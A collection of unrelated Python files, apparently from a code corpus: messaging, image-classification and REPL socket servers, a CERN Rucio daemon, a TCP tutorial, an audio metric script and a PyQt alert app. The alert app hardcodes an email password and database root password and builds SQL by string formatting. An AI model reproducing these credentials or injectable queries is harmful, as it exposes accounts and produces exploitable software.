The arrays are appended to a HDF5 dataset. New arrays are being requested in
prefetch manner so that data is meant to be always available for writing.
'''
log = logging.getLogger("consumer")
dealer = ctx.socket(zmq.DEALER)
socket_name = "tcp://127.0.0.1:6000"
log.info("Connecting to socket name: %s", socket_name)
dealer.connect(socket_name)
dealer.hwm = PIPELINE
log.debug("Dealer HWM: %d", dealer.hwm)
credit = PIPELINE
while True:
while credit:
log.debug("Request: gimme more")
dealer.send_multipart([b"fetch"])
credit -= 1
log.debug("Receive...")
try:
raw_data = dealer.recv()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
log.warning("Shutting down. zmq.ETERM")
return
else:
raise
log.debug("Received: %d", len(raw_data))
log.debug(raw_data)
log.info("Consumer finished...")
pipe.send(b"OK")
def main():
# Start child threads
ctx = zmq.Context()
a,b = zpipe(ctx)
client = Thread(target=consumer, args=(ctx, b))
server = Thread(target=producer, args=(ctx,))
client.start()
server.start()
# loop until client tells us it's done
try:
print a.recv()
except KeyboardInterrupt:
pass
del a,b
ctx.term()
if __name__ == '__main__':
main()
|
server.py
|
#!/usr/bin/env python
import socket
from threading import Thread
import numpy as np
import os
import argparse
import config
import util
import joblib
import traceback
from keras.applications.imagenet_utils import preprocess_input
import time
util.set_img_format()
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True, help='Base model architecture',
choices=[config.MODEL_RESNET50,
config.MODEL_RESNET152,
config.MODEL_INCEPTION_V3,
config.MODEL_VGG16,
config.MODEL_MOBILENET])
args = parser.parse_args()
config.model = args.model
model_module = util.get_model_class_instance()
model = model_module.load()
print('Model loaded')
print('Warming up the model')
start = time.clock()
if util.get_keras_backend_name() != 'tensorflow':
input_shape = (1, 3,) + model_module.img_size
else:
input_shape = (1, ) + model_module.img_size + (3, )
dummpy_img = np.ones(input_shape)
dummpy_img = preprocess_input(dummpy_img)
model.predict(dummpy_img)
end = time.clock()
print('Warming up took {} s'.format(end - start))
print('Trying to load a Novelty Detector')
try:
af = util.get_activation_function(model, model_module.noveltyDetectionLayerName)
print('Activation function is loaded')
novelty_detection_clf = joblib.load(config.get_novelty_detection_model_path())
print('Novelty Detection classifier is loaded')
except Exception as e:
print('Error on loading Novelty Detection classifier', e)
FILE_DOES_NOT_EXIST = '-1'
UNKNOWN_ERROR = '-2'
def handle(clientsocket):
while 1:
buf = clientsocket.recv(config.buffer_size)
if buf == 'exit'.encode():
return # client terminated connection
response = ''
if os.path.isfile(buf):
try:
img = [model_module.load_img(buf)]
out = model.predict(np.array(img))
prediction = np.argmax(out)
top10 = out[0].argsort()[-10:][::-1]
class_indices = dict(zip(config.classes, range(len(config.classes))))
keys = list(class_indices.keys())
values = list(class_indices.values())
answer = keys[values.index(prediction)]
try:
acts = util.get_activations(af, img)
predicted_relativity = novelty_detection_clf.predict(acts)[0]
nd_class = novelty_detection_clf.__classes[predicted_relativity]
except Exception as e:
print(e.message)
nd_class = 'related'
top10_json = "["
for i, t in enumerate(top10):
top10_json += '{"probability":"%s", "class":"%s"}%s' % (
out[0][t], keys[values.index(t)], '' if i == 9 else ',')
top10_json += "]"
response = '{"probability":"%s","class":"%s","relativity":"%s","top10":%s}' % (
out[0][prediction], answer, nd_class, top10_json)
print(response)
except Exception as e:
print('Error', e)
traceback.print_stack()
response = UNKNOWN_ERROR
else:
response = FILE_DOES_NOT_EXIST
clientsocket.sendall(response.encode())
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(config.server_address)
serversocket.listen(10000)
print('Ready for requests')
while 1:
# accept connections from outside
(clientsocket, address) = serversocket.accept()
ct = Thread(target=handle, args=(clientsocket,))
ct.run()
|
repairer.py
|
# -*- coding: utf-8 -*-
# Copyright 2013-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Vincent Garonne <vincent.garonne@cern.ch>, 2014-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2014-2015
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
"""
Judge-Repairer is a daemon to repair stuck replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match
from sqlalchemy.exc import DatabaseError
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter
from rucio.core.rule import repair_rule, get_stuck_rules
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_repairer(once=False):
"""
Main loop to check for STUCK replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-repairers have the correct worker number on the next try
executable = 'judge-repairer'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
# Select a bunch of rules for this worker to repair
rules = get_stuck_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
delta=-1 if once else 1800,
limit=100,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_repairer[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_repairer[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule_id in rules:
rule_id = rule_id[0]
logging.info('rule_repairer[%s/%s]: Repairing rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
repair_rule(rule_id=rule_id)
logging.debug('rule_repairer[%s/%s]: repairing of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
logging.warning('rule_repairer[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Repairer threads.
"""
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
executable = 'judge-repairer'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_repairer(once)
else:
logging.info('Repairer starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_repairer, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
replserver.py
|
"""
socat - UNIX-CONNECT:repl.sock
import sys, threading, pdb, functools
def _attach(repl):
frame = sys._current_frames()[threading.enumerate()[0].ident]
debugger = pdb.Pdb(
stdin=repl.conn.makefile('r'),
stdout=repl.conn.makefile('w'),
)
debugger.reset()
while frame:
frame.f_trace = debugger.trace_dispatch
debugger.botframe = frame
frame = frame.f_back
debugger.set_step()
frame.f_trace = debugger.trace_dispatch
"""
import ast
import codeop
import contextlib
import errno
import functools
import logging
import os
import socket as socket_
import sys
import threading
import traceback
import types
import typing as ta
import weakref
from . import check
log = logging.getLogger(__name__)
class DisconnectException(Exception):
pass
class InteractiveSocketConsole:
"""code.InteractiveConsole but just different enough to not be worth subclassing."""
ENCODING = 'utf-8'
def __init__(
self,
conn: socket_.socket,
locals: ta.MutableMapping = None,
filename: str = '<console>'
) -> None:
super().__init__()
if locals is None:
locals = {
'__name__': '__console__',
'__doc__': None,
'__console__': self,
}
self._conn = conn
self._locals = locals
self._filename = filename
self._compiler = codeop.CommandCompiler()
self._buffer: ta.List[str] = []
self._count = 0
self._write_count = -1
def reset_buffer(self) -> None:
self._buffer = []
@property
def conn(self) -> socket_.socket:
return self._conn
CPRT = 'Type "help", "copyright", "credits" or "license" for more information.'
def interact(self, banner: str = None, exitmsg: str = None) -> None:
log.info(f'Console {id(self)} on thread {threading.current_thread().ident} interacting')
try:
ps1 = getattr(sys, 'ps1', '>>> ')
ps2 = getattr(sys, 'ps2', '... ')
if banner is None:
self.write(
'Python %s on %s\n%s\n(%s)\n' %
(sys.version, sys.platform, self.CPRT, self.__class__.__name__))
elif banner:
self.write('%s\n' % (str(banner),))
more = False
while True:
try:
try:
line = self.raw_input(ps2 if more else ps1)
except EOFError:
self.write('\n')
break
else:
more = self.push_line(line)
except KeyboardInterrupt:
self.write('\nKeyboardInterrupt\n')
self.reset_buffer()
more = False
if exitmsg is None:
self.write('now exiting %s...\n' % self.__class__.__name__)
elif exitmsg != '':
self.write('%s\n' % exitmsg)
except DisconnectException:
pass
except OSError as oe:
if oe.errno == errno.EBADF:
pass
finally:
log.info(f'Console {id(self)} on thread {threading.current_thread().ident} finished')
def push_line(self, line: str) -> bool:
self._buffer.append(line)
source = '\n'.join(self._buffer)
more = self.run_source(source, self._filename)
if not more:
self.reset_buffer()
return more
def raw_input(self, prompt: str = '') -> str:
self.write(prompt)
buf = b''
while True:
b = self._conn.recv(1)
if not b:
raise DisconnectException
if b == b'\n':
break
buf += b
return buf.decode(self.ENCODING)
def write(self, data: str) -> None:
self._conn.send(data.encode(self.ENCODING))
def compile(
self,
source: ta.Union[str, ast.AST],
filename: str = '<input>',
symbol: str = 'single'
) -> ta.Optional[types.CodeType]:
if isinstance(source, ast.AST):
return self._compiler.compiler(source, filename, symbol)
else:
return self._compiler(source, filename, symbol)
def run_source(
self,
source: ta.Union[str, ast.AST],
filename: str = '<input>',
symbol: str = 'single',
) -> bool:
try:
code = self.compile(source, filename, symbol)
except (OverflowError, SyntaxError, ValueError):
# Case 1 (incorrect)
self.show_syntax_error(filename)
return False
if code is None:
# Case 2 (incomplete)
return True
# Case 3 (complete)
try:
node = ast.parse(source)
except (OverflowError, SyntaxError, ValueError):
return True
if isinstance(node, ast.Module) and node.body and isinstance(node.body[-1], ast.Expr):
expr = node.body[-1]
source = ast.Interactive(
[
*node.body[:-1],
ast.Assign(
[ast.Name(
f'_{self._count}',
ast.Store(),
lineno=expr.lineno,
col_offset=expr.col_offset,
)],
expr.value,
lineno=expr.lineno,
col_offset=expr.col_offset,
)
],
)
ast.fix_missing_locations(source)
self._write_count = self._count
code = self.compile(source, filename, symbol)
self.run_code(code)
return False
def run_code(self, code: types.CodeType) -> None:
try:
exec(code, self._locals)
except SystemExit:
raise
except Exception:
self.show_traceback()
else:
if self._count == self._write_count:
self.write(repr(self._locals[f'_{self._count}']))
self.write('\n')
self._count += 1
def show_traceback(self) -> None:
sys.last_type, sys.last_value, last_tb = ei = sys.exc_info()
sys.last_traceback = last_tb
try:
lines = traceback.format_exception(ei[0], ei[1], last_tb.tb_next)
self.write(''.join(lines))
finally:
last_tb = ei = None
def show_syntax_error(self, filename: str = None) -> None:
type, value, tb = sys.exc_info()
sys.last_type = type
sys.last_value = value
sys.last_traceback = tb
if filename and type is SyntaxError:
# Work hard to stuff the correct filename in the exception
try:
msg, (dummy_filename, lineno, offset, line) = value.args
except ValueError:
# Not the format we expect; leave it alone
pass
else:
# Stuff in the right filename
value = SyntaxError(msg, (filename, lineno, offset, line))
sys.last_value = value
lines = traceback.format_exception_only(type, value)
self.write(''.join(lines))
class ReplServer:
CONNECTION_THREAD_NAME = 'ReplServerConnection'
def __init__(
self,
path: str,
*,
file_mode: int = None,
poll_interval: float = 0.5,
exit_timeout: float = 10.0,
) -> None:
super().__init__()
self._path = path
self._file_mode = file_mode
self._poll_interval = poll_interval
self._exit_timeout = exit_timeout
self._socket: socket_.socket = None
self._is_running = False
self._consoles_by_threads: ta.MutableMapping[threading.Thread, InteractiveSocketConsole] = weakref.WeakKeyDictionary() # noqa
self._is_shut_down = threading.Event()
self._should_shutdown = False
def __enter__(self):
check.state(not self._is_running)
check.state(not self._is_shut_down.is_set())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not self._is_shut_down.is_set():
self.shutdown(True, self._exit_timeout)
def run(self) -> None:
check.state(not self._is_running)
check.state(not self._is_shut_down.is_set())
if os.path.exists(self._path):
os.unlink(self._path)
self._socket = socket_.socket(socket_.AF_UNIX, socket_.SOCK_STREAM)
self._socket.settimeout(self._poll_interval)
self._socket.bind(self._path)
with contextlib.closing(self._socket):
self._socket.listen(1)
log.info(f'Repl server listening on file {self._path}')
self._is_running = True
try:
while not self._should_shutdown:
try:
conn, _ = self._socket.accept()
except socket_.timeout:
continue
log.info(f'Got repl server connection on file {self._path}')
def run(conn):
with contextlib.closing(conn):
variables = globals().copy()
console = InteractiveSocketConsole(conn, variables)
variables['__console__'] = console
log.info(
f'Starting console {id(console)} repl server connection '
f'on file {self._path} '
f'on thread {threading.current_thread().ident}'
)
self._consoles_by_threads[threading.current_thread()] = console
console.interact()
thread = threading.Thread(
target=functools.partial(run, conn),
daemon=True,
name=self.CONNECTION_THREAD_NAME)
thread.start()
for thread, console in self._consoles_by_threads.items():
try:
console.conn.close()
except Exception:
log.exception('Error shutting down')
for thread in self._consoles_by_threads.keys():
try:
thread.join(self._exit_timeout)
except Exception:
log.exception('Error shutting down')
os.unlink(self._path)
finally:
self._is_shut_down.set()
self._is_running = False
def shutdown(self, block: bool = False, timeout: float = None) -> None:
self._should_shutdown = True
if block:
self._is_shut_down.wait(timeout=timeout)
def _main():
with ReplServer('repl.sock') as repl_server:
repl_server.run()
if __name__ == '__main__':
_main()
|
C16_tcpserver.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'TCP网络编程的练习'
__author__ = 'Jacklee'
# socket模块
# 网络编程的基础是Internet协议族
# 协议族中最长用的是HTTP协议
# HTTP协议的网络层是TCP协议
# TCP协议是一种面向连接的通讯协议
# 由一个Server端和多个Client端组成
# 客户端与服务端建立连接后,可以双向进行数据的传输
# TCP协议实现
import socket
import threading, time
# socket对象
# socket(family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None)
# : family 协议族,默认IPv4
# : type 类型,默认流
# 创建一个socket
tcpserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('创建了一个socket...')
# 绑定IP地址和端口号
# 1. 有可能有多块网卡,需要指定
# 2. 需要指定端口号
# bind(address)
# :address 是一个地址对
tcpserver.bind(('127.0.0.1', 6789))
print('socket绑定到本机的6789端口....')
# 等待接收客户端的连接
# listen([backlog])
# :backlog 最大连接数
tcpserver.listen(5)
print('socket允许最大5个连接...')
print('等待客户端连接...')
def tcplink(sock, addr):
print('接收了一个新的客户端连接. %s:%s...' % addr)
sock.send('欢迎!'.encode('utf-8'))
while True:
# 从socket读取数据
# 该函数属于阻塞函数
# 如果没有读取到数据,则一直等待不返回
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('你好, %s!' % data.decode('utf-8')).encode('utf-8'))
sock.close()
print('来自%s:%s的连接关闭.' % addr)
# 循环等待客户端的连接
# 如果有连接则创建一个新的线程执行读写操作
# (conn, addr) = accept()
# :conn 返回一个socket对象,可以进行读写操作
# :addr 返回连接的地址对
# 是阻塞函数,当没有接收到新的连接时,一直等待不返回
while True:
sock, addr = tcpserver.accept()
trd = threading.Thread(target=tcplink, args=(sock, addr))
trd.start()
|
evaluate_mcd.py
|
#!/usr/bin/env python3
# Copyright 2020 Wen-Chin Huang and Tomoki Hayashi
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Evaluate MCD between generated and groundtruth audios with SPTK-based mcep."""
import argparse
import fnmatch
import logging
import multiprocessing as mp
import os
from typing import Dict, List, Tuple
import librosa
import numpy as np
import pysptk
import soundfile as sf
from fastdtw import fastdtw
from scipy import spatial
def find_files(
root_dir: str, query: List[str] = ["*.flac", "*.wav"], include_root_dir: bool = True
) -> List[str]:
"""Find files recursively.
Args:
root_dir (str): Root root_dir to find.
query (List[str]): Query to find.
include_root_dir (bool): If False, root_dir name is not included.
Returns:
List[str]: List of found filenames.
"""
files = []
for root, dirnames, filenames in os.walk(root_dir, followlinks=True):
for q in query:
for filename in fnmatch.filter(filenames, q):
files.append(os.path.join(root, filename))
if not include_root_dir:
files = [file_.replace(root_dir + "/", "") for file_ in files]
return files
def sptk_extract(
x: np.ndarray,
fs: int,
n_fft: int = 512,
n_shift: int = 256,
mcep_dim: int = 25,
mcep_alpha: float = 0.41,
is_padding: bool = False,
) -> np.ndarray:
"""Extract SPTK-based mel-cepstrum.
Args:
x (ndarray): 1D waveform array.
fs (int): Sampling rate
n_fft (int): FFT length in point (default=512).
n_shift (int): Shift length in point (default=256).
mcep_dim (int): Dimension of mel-cepstrum (default=25).
mcep_alpha (float): All pass filter coefficient (default=0.41).
is_padding (bool): Whether to pad the end of signal (default=False).
Returns:
ndarray: Mel-cepstrum with the size (N, n_fft).
"""
# perform padding
if is_padding:
n_pad = n_fft - (len(x) - n_fft) % n_shift
x = np.pad(x, (0, n_pad), "reflect")
# get number of frames
n_frame = (len(x) - n_fft) // n_shift + 1
# get window function
win = pysptk.sptk.hamming(n_fft)
# check mcep and alpha
if mcep_dim is None or mcep_alpha is None:
mcep_dim, mcep_alpha = _get_best_mcep_params(fs)
# calculate spectrogram
mcep = [
pysptk.mcep(
x[n_shift * i : n_shift * i + n_fft] * win,
mcep_dim,
mcep_alpha,
eps=1e-6,
etype=1,
)
for i in range(n_frame)
]
return np.stack(mcep)
def _get_basename(path: str) -> str:
return os.path.splitext(os.path.split(path)[-1])[0]
def _get_best_mcep_params(fs: int) -> Tuple[int, float]:
if fs == 16000:
return 23, 0.42
elif fs == 22050:
return 34, 0.45
elif fs == 24000:
return 34, 0.46
elif fs == 44100:
return 39, 0.53
elif fs == 48000:
return 39, 0.55
else:
raise ValueError(f"Not found the setting for {fs}.")
def calculate(
file_list: List[str],
gt_file_list: List[str],
args: argparse.Namespace,
mcd_dict: Dict,
):
"""Calculate MCD."""
for i, gen_path in enumerate(file_list):
corresponding_list = list(
filter(lambda gt_path: _get_basename(gt_path) in gen_path, gt_file_list)
)
assert len(corresponding_list) == 1
gt_path = corresponding_list[0]
gt_basename = _get_basename(gt_path)
# load wav file as int16
gen_x, gen_fs = sf.read(gen_path, dtype="int16")
gt_x, gt_fs = sf.read(gt_path, dtype="int16")
fs = gen_fs
if gen_fs != gt_fs:
gt_x = librosa.resample(gt_x.astype(np.float), gt_fs, gen_fs)
# extract ground truth and converted features
gen_mcep = sptk_extract(
x=gen_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
gt_mcep = sptk_extract(
x=gt_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
# DTW
_, path = fastdtw(gen_mcep, gt_mcep, dist=spatial.distance.euclidean)
twf = np.array(path).T
gen_mcep_dtw = gen_mcep[twf[0]]
gt_mcep_dtw = gt_mcep[twf[1]]
# MCD
diff2sum = np.sum((gen_mcep_dtw - gt_mcep_dtw) ** 2, 1)
mcd = np.mean(10.0 / np.log(10.0) * np.sqrt(2 * diff2sum), 0)
logging.info(f"{gt_basename} {mcd:.4f}")
mcd_dict[gt_basename] = mcd
def get_parser() -> argparse.Namespace:
"""Get argument parser."""
parser = argparse.ArgumentParser(description="Evaluate Mel-cepstrum distortion.")
parser.add_argument(
"gen_wavdir_or_wavscp",
type=str,
help="Path of directory or wav.scp for generated waveforms.",
)
parser.add_argument(
"gt_wavdir_or_wavscp",
type=str,
help="Path of directory or wav.scp for ground truth waveforms.",
)
parser.add_argument(
"--outdir",
type=str,
help="Path of directory to write the results.",
)
# analysis related
parser.add_argument(
"--mcep_dim",
default=None,
type=int,
help=(
"Dimension of mel cepstrum coefficients. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--mcep_alpha",
default=None,
type=float,
help=(
"All pass constant for mel-cepstrum analysis. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--n_fft",
default=1024,
type=int,
help="The number of FFT points.",
)
parser.add_argument(
"--n_shift",
default=256,
type=int,
help="The number of shift points.",
)
parser.add_argument(
"--nj",
default=16,
type=int,
help="Number of parallel jobs.",
)
parser.add_argument(
"--verbose",
default=1,
type=int,
help="Verbosity level. Higher is more logging.",
)
return parser
def main():
"""Run MCD calculation in parallel."""
args = get_parser().parse_args()
# logging info
if args.verbose > 1:
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
elif args.verbose > 0:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
logging.basicConfig(
level=logging.WARN,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
logging.warning("Skip DEBUG/INFO messages")
# find files
if os.path.isdir(args.gen_wavdir_or_wavscp):
gen_files = sorted(find_files(args.gen_wavdir_or_wavscp))
else:
with open(args.gen_wavdir_or_wavscp) as f:
gen_files = [line.strip().split(None, 1)[1] for line in f.readlines()]
if gen_files[0].endswith("|"):
raise ValueError("Not supported wav.scp format.")
if os.path.isdir(args.gt_wavdir_or_wavscp):
gt_files = sorted(find_files(args.gt_wavdir_or_wavscp))
else:
with open(args.gt_wavdir_or_wavscp) as f:
gt_files = [line.strip().split(None, 1)[1] for line in f.readlines()]
if gt_files[0].endswith("|"):
raise ValueError("Not supported wav.scp format.")
# Get and divide list
if len(gen_files) == 0:
raise FileNotFoundError("Not found any generated audio files.")
if len(gen_files) > len(gt_files):
raise ValueError(
"#groundtruth files are less than #generated files "
f"(#gen={len(gen_files)} vs. #gt={len(gt_files)}). "
"Please check the groundtruth directory."
)
logging.info("The number of utterances = %d" % len(gen_files))
file_lists = np.array_split(gen_files, args.nj)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
with mp.Manager() as manager:
mcd_dict = manager.dict()
processes = []
for f in file_lists:
p = mp.Process(target=calculate, args=(f, gt_files, args, mcd_dict))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
# convert to standard list
mcd_dict = dict(mcd_dict)
# calculate statistics
mean_mcd = np.mean(np.array([v for v in mcd_dict.values()]))
std_mcd = np.std(np.array([v for v in mcd_dict.values()]))
logging.info(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
# write results
if args.outdir is None:
if os.path.isdir(args.gen_wavdir_or_wavscp):
args.outdir = args.gen_wavdir_or_wavscp
else:
args.outdir = os.path.dirname(args.gen_wavdir_or_wavscp)
os.makedirs(args.outdir, exist_ok=True)
with open(f"{args.outdir}/utt2mcd", "w") as f:
for utt_id in sorted(mcd_dict.keys()):
mcd = mcd_dict[utt_id]
f.write(f"{utt_id} {mcd:.4f}\n")
with open(f"{args.outdir}/mcd_avg_result.txt", "w") as f:
f.write(f"#utterances: {len(gen_files)}\n")
f.write(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
logging.info("Successfully finished MCD evaluation.")
if __name__ == "__main__":
main()
|
Alert_Area1.py
|
# -*- coding: utf-8 -*-
from PyQt5 import QtCore, QtGui, QtWidgets
import pygame
import pymysql
from PyQt5.QtCore import QTimer
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import multiprocessing
import datetime
class Ui_Alert1(object):
update = 1
count = 0
tw = time.time()
flag = False
def __init__(self, num):
self.num = num
self.timer = QTimer()
# set timer timeout callback function
self.timer.timeout.connect(self.viewcam)
# set control_bt callback clicked function
def viewcam(self):
t1 = time.time()
print('###############',self.num)
if t1 - self.tw >= self.update:
self.count += 1
con = self.num - self.count
self.btn_sndmail.setText('Send Mail ' + str(con))
print(con)
if con == 0:
print('Send Mail')
self.count = 0
self.btn_sndmail.setText('Send')
self.timer.stop()
P1 = multiprocessing.Process(target=self.send_mail)
P1.start()
self.tw = time.time()
def controlTimer(self):
# if timer is stopped
if not self.timer.isActive():
self.timer.start(20)
def stop_(self):
self.btn_sndmail.setText('Send Mail')
self.timer.stop()
def send_mail(self):
connection = pymysql.connect("localhost", "root", "rootpass", "project")
cursor = connection.cursor()
cursor.execute("select count(*) from inform")
row = cursor.fetchone()
total_row = int(row[0])
print('total row', total_row)
name = 'Name : '+self.lineEdit_name.text()+', '
age = 'Age : '+self.lineEdit_age.text()+', '
gender = 'Gender : '+self.lineEdit_gender.text()+', '
citizen = ' Nationality : '+self.lineEdit_nationality.text()+', '
other = 'OtherInfo : '+self.lineEdit_other.text()
table = name+age+gender+citizen+other
cursor.execute("SELECT * FROM inform")
rw = cursor.fetchone()
for i in range(total_row):
email = 'faizk2651@gmail.com'
password = '9892338308'
send_to_email = rw[2]
subject = 'ALERT!'
address = 'Goregaon(W),Patkar College'
message = rw[1]+' this is an autogenerated mail to alert you, a suspicious person is detected on Date/Time '+self.curr_dt+' at Address: '+address+'. Suspect Information :'+table
files = [self.enrolled_img,self.lastmatch_img]
msg = MIMEMultipart()
msg['To'] = send_to_email
msg['From'] = email
msg['Subject'] = subject
body = MIMEText(message, 'html', 'utf-8')
msg.attach(body) # add message body (text or html)
for f in files: # add files to the message
attachment = MIMEApplication(open(f, "rb").read(), _subtype="txt")
attachment.add_header('Content-Disposition', 'attachment', filename=f)
msg.attach(attachment)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(send_to_email, password)
text = msg.as_string()
server.sendmail(send_to_email, send_to_email, text)
print(str(i),' ',rw[1])
rw = cursor.fetchone()
server.quit()
def display_profile(self,f_name,f_name2):
self.curr_dt = str(datetime.datetime.now())
connnection = pymysql.connect("localhost","root","rootpass","project")
cursor = connnection.cursor()
select_query = "select * from blockacess where fname ='%s'" %(f_name)
cursor.execute(select_query)
row = cursor.fetchone()
self.lineEdit_id.setText(str(row[0]))
self.lineEdit_name.setText(row[1])
self.lineEdit_age.setText(row[3])
self.lineEdit_gender.setText(row[4])
self.lineEdit_nationality.setText(row[5])
self.lineEdit_other.setText(row[6])
self.lineEdit_datetime.setText(self.curr_dt)
#self.lineEdit_date.setText(curdate())
#self.lineEdit_time.setText(curtime())
self.enrolled_img = 'Registered/' + f_name + '.jpg'
self.lastmatch_img = 'Monitor/Registered/'+f_name+'/' + f_name2
pixmap = QtGui.QPixmap('Registered/' + f_name + '.jpg')
pixmap = pixmap.scaled(self.label_img1.width(), self.label_img1.height(), QtCore.Qt.KeepAspectRatio)
self.label_img1.setPixmap(pixmap)
self.label_img1.setAlignment(QtCore.Qt.AlignCenter)
pixmap = QtGui.QPixmap('Monitor/Registered/'+f_name+'/' + f_name2)
pixmap = pixmap.scaled(self.label_img2.width(), self.label_img2.height(), QtCore.Qt.KeepAspectRatio)
self.label_img2.setPixmap(pixmap)
self.label_img2.setAlignment(QtCore.Qt.AlignCenter)
P1 = multiprocessing.Process(target=self.view)
P1.start()
def view(self):
ID = int(self.lineEdit_id.text())
connnection = pymysql.connect("localhost", "root", "rootpass", "project")
cursor = connnection.cursor()
select_query = ("select count(*) from view where id =%d") % (ID)
cursor.execute(select_query)
r = cursor.fetchone()
v = int(r[0]) + 1
insert_query = "insert into view(id,curr_time,curr_date,visit) values(%d,curtime(),curdate(),%d)" % (ID, v)
cursor.execute(insert_query)
connnection.commit()
connnection.close()
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(681, 343)
MainWindow.setStyleSheet("*{\n"
" color:rgb(186, 189, 182);\n"
